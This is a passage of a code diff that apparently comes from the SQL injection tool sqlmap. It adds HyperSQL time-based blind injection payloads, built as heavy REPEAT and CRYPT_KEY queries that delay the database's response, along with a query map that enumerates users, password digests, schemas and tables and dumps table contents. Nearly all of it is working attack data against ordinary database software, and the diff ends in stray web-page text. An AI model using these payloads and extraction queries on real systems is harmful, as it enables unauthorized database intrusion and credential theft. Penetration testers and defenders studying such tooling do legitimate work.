<payload>OR '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>HSQL</dbms>
|
||||
<dbms_version>>= 1.7.2</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>HSQL >= 1.7.2 OR time-based blind (heavy query - comment)</title>
|
||||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
|
||||
<request>
|
||||
<payload>OR '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
|
||||
<comment>--</comment>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>HSQL</dbms>
|
||||
<dbms_version>>= 1.7.2</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>HSQL > 2.0 OR time-based blind (heavy query)</title>
|
||||
<stype>5</stype>
|
||||
<level>2</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
|
||||
<request>
|
||||
<payload>OR '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>HSQL</dbms>
|
||||
<dbms_version>> 2.0</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>HSQL > 2.0 OR time-based blind (heavy query - comment)</title>
|
||||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
|
||||
<request>
|
||||
<payload>OR '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
|
||||
<comment>--</comment>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>HSQL</dbms>
|
||||
<dbms_version>> 2.0</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
<!-- TODO: if possible, add payload for Microsoft Access -->
|
||||
<!-- End of OR time-based blind tests -->
|
||||
|
||||
|
@ -3211,7 +3414,7 @@ Formats:
|
|||
</test>
|
||||
|
||||
<test>
|
||||
<title>IBM DB2 AND time-based blind (heavy query)</title>
|
||||
<title>IBM DB2 time-based blind - Parameter replace (heavy query)</title>
|
||||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
|
@ -3228,6 +3431,47 @@ Formats:
|
|||
<dbms>IBM DB2</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<!-- Untested -->
|
||||
<test>
|
||||
<title>HSQL >= 1.7.2 time-based blind - Parameter replace (heavy query)</title>
|
||||
<stype>5</stype>
|
||||
<level>2</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>HSQL</dbms>
|
||||
<dbms_version>>= 1.7.2</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>HSQL > 2.0 time-based blind - Parameter replace (heavy query)</title>
|
||||
<stype>5</stype>
|
||||
<level>2</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>HSQL</dbms>
|
||||
<dbms_version>> 2.0</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
<!-- End of time-based blind tests - Parameter replace -->
|
||||
|
||||
|
||||
|
@ -3389,6 +3633,47 @@ Formats:
|
|||
<dbms>Oracle</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>HSQL >= 1.7.2 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
|
||||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>2</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
|
||||
<request>
|
||||
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
|
||||
<comment>--</comment>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>HSQL</dbms>
|
||||
<dbms_version>>= 1.7.2</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>HSQL > 2.0 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
|
||||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>2</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</vector>
|
||||
<request>
|
||||
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>HSQL</dbms>
|
||||
<dbms_version>> 2.0</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
<!-- TODO: if possible, add payload for Microsoft Access -->
|
||||
<!-- End of time-based blind tests - GROUP BY and ORDER BY clause -->
|
||||
|
||||
|
|
|
@ -625,4 +625,71 @@
|
|||
<blind query="SELECT tabschema FROM (SELECT DISTINCT(tabschema) FROM sysstat.columns WHERE %s) AS foobar" query2="SELECT DISTINCT(tabname) FROM sysstat.columns WHERE tabschema='%s'" count="SELECT COUNT(DISTINCT(tabschema)) FROM sysstat.columns WHERE %s" count2="SELECT COUNT(DISTINCT(tabname)) FROM sysstat.columns WHERE tabschema='%s'" condition="colname" condition2="tabschema" condition3="tabname"/>
|
||||
</search_column>
|
||||
</dbms>
|
||||
|
||||
<!-- HSQL (Based on MYSQL)-->
|
||||
<dbms value="HyperSQL">
|
||||
<cast query="CAST(%s AS LONGVARCHAR)"/>
|
||||
<length query="CHAR_LENGTH(%s)"/>
|
||||
<isnull query="IFNULL(%s,' ')"/>
|
||||
<delimiter query=","/>
|
||||
<limit query="LIMIT %d %d"/>
|
||||
<limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
|
||||
<limitgroupstart query="1"/>
|
||||
<limitgroupstop query="2"/>
|
||||
<limitstring query=" LIMIT "/>
|
||||
<order query="ORDER BY %s ASC"/>
|
||||
<count query="COUNT(%s)"/>
|
||||
<comment query="--" query2="/*" query3="//"/>
|
||||
<substring query="SUBSTR((%s),%d,%d)"/>
|
||||
<concatenate query="CONCAT(%s,%s)"/>
|
||||
<case query="(CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
|
||||
<hex query="RAWTOHEX(%s)"/>
|
||||
<inference query="ASCII(SUBSTR((%s),%d,1))>%d"/>
|
||||
<banner query="DATABASE_VERSION()"/>
|
||||
<current_user query="CURRENT_USER"/>
|
||||
<current_db query="DATABASE()"/>
|
||||
<hostname query=""/>
|
||||
<is_dba query="SELECT ADMIN FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE USER=CURRENT_USER"/>
|
||||
<check_udf/>
|
||||
<users>
|
||||
<inband query="SELECT user FROM INFORMATION_SCHEMA.SYSTEM_USERS"/>
|
||||
<!-- LIMIT is needed at start for v1.7 this gets mangled unless no-cast is used -->
|
||||
<blind query="SELECT LIMIT %d 1 DISTINCT(user) FROM INFORMATION_SCHEMA.SYSTEM_USERS" count="SELECT COUNT(DISTINCT(user)) FROM INFORMATION_SCHEMA.SYSTEM_USERS"/>
|
||||
</users>
|
||||
<passwords>
|
||||
<!-- Passwords only shown in later versions >=2.0 -->
|
||||
<inband query="SELECT user_name,password_digest FROM INFORMATION_SCHEMA.SYSTEM_USERS" condition="user_name"/>
|
||||
<blind query="SELECT LIMIT %d 1 DISTINCT(password_digest) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s'" count="SELECT COUNT(DISTINCT(password_digest)) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s'"/>
|
||||
</passwords>
|
||||
<privileges/>
|
||||
<roles/>
|
||||
<dbs>
|
||||
<inband query="SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS" />
|
||||
<blind query="SELECT LIMIT %d 1 DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS" count="SELECT COUNT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS"/>
|
||||
</dbs>
|
||||
<tables>
|
||||
<inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES" condition="table_schem"/>
|
||||
<blind query="SELECT LIMIT %d 1 table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s' " count="SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s'"/>
|
||||
</tables>
|
||||
<columns>
|
||||
<inband query="SELECT column_name,type_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s'" condition="column_name"/>
|
||||
<blind query="SELECT column_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s'" query2="SELECT column_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'" count="SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
|
||||
<blind query="SELECT LIMIT %d 1 %s FROM %s.%s ORDER BY %s " count="SELECT COUNT(*) FROM %s.%s"/>
|
||||
</dump_table>
|
||||
<search_db>
|
||||
<inband query="SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s" condition="table_schem"/>
|
||||
<blind query="SELECT DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s" count="SELECT COUNT(DISTINCT(table_schem)) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s" condition="table_schem"/>
|
||||
</search_db>
|
||||
<search_table>
|
||||
<inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s" condition="table_name" condition2="table_schem"/>
|
||||
<blind query="SELECT DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s" count="SELECT COUNT(DISTINCT(table_schem)) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s" condition="table_name" condition2="table_schem"/>
|
||||
</search_table>
|
||||
<search_column>
|
||||
<inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" condition="column_name" condition2="table_schem" condition3="table_name"/>
|
||||
<blind query="SELECT DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" count="SELECT COUNT(DISTINCT(table_schem)) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" condition="column_name" condition2="table_schem" condition3="table_name"/>
|
||||
</search_column>
|
||||
</dbms>
|
||||
</root>
|
||||
|
|
Loading…
Reference in New Issue
Block a user